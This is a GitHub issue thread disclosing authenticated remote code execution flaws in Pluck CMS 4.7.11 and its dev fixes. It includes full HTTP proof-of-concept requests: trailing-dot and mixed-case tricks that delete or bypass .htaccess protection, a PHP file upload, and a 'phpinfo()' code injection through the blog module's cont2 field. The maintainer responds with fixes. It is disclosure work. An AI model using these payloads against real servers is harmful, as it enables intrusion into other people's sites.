Pluck-4.7.11 admin background exists a remote command execution vulnerability when uploading files
wooyin opened this issue · comments
Pluck-4.7.11 admin background exists a remote command execution vulnerability when uploading files
Proof
step1: login -> pages -> manage files
upload .htaccess file to turn files/.htaccess to .htaccess.txt
step2: throw .htaccess.txt into trash
POST /pluck4711/admin.php?action=files HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------18467633426500
Content-Length: 339
Connection: close
Referer: http://127.0.0.1/pluck4711/admin.php?action=files
Cookie: PHPSESSID=50oi7cqaj4hrmj6pqiufa57lij
Upgrade-Insecure-Requests: 1
-----------------------------18467633426500
Content-Disposition: form-data; name="filefile"; filename="pass07.php......"
Content-Type: application/octet-stream
<?php echo phpinfo();?>
-----------------------------18467633426500
Content-Disposition: form-data; name="submit"
Upload
-----------------------------18467633426500--
step4: view http://127.0.0.1/pluck4711/files/pass07.php
Thanks... good find... Missed this in the testing. .htaccess will now be ignored when uploaded.
Could you try the https://github.com/pluck-cms/pluck/tree/4.7.12-dev1 release?
can bypass like this
GET /pluck-4.7.12-dev1/admin.php?action=deletefile&var1=.htaccess HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1/pluck-4.7.12-dev1/admin.php?action=files
Cookie: PHPSESSID=57e7d8gah1oa5b6vomb6dnel35
Upgrade-Insecure-Requests: 1
POST /pluck-4.7.12-dev1/admin.php?action=files HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------293582696224464
Content-Length: 346
Connection: close
Referer: http://127.0.0.1/pluck-4.7.12-dev1/admin.php?action=files
Cookie: PHPSESSID=57e7d8gah1oa5b6vomb6dnel35
Upgrade-Insecure-Requests: 1
-----------------------------293582696224464
Content-Disposition: form-data; name="filefile"; filename=".htaccess..........."
Content-Type: application/octet-stream
-----------------------------293582696224464
Content-Disposition: form-data; name="submit"
Upload
-----------------------------293582696224464--
could you do a retest with version https://github.com/pluck-cms/pluck/tree/4.7.12-dev2
GET /pluck-4.7.12-dev2/admin.php?action=deletefile&var1=.htACcess HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1/pluck-4.7.12-dev2/admin.php?action=files
Cookie: PHPSESSID=mmhe135g2qbk80543g5f6bjksg
Upgrade-Insecure-Requests: 1
And you should solve this too.
cont2 is vulnable
POST /pluck-4.7.12-dev2/admin.php?module=blog&page=newpost HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Connection: close
Referer: http://127.0.0.1/pluck-4.7.12-dev2/admin.php?module=blog&page=newpost
Cookie: PHPSESSID=mmhe135g2qbk80543g5f6bjksg
Upgrade-Insecure-Requests: 1
cont1=11111&cont2=2';phpinfo();/*&cont3=22222&save_exit=Save+and+Exit
Ok.. I’ll try to find a solution for the windows mishaps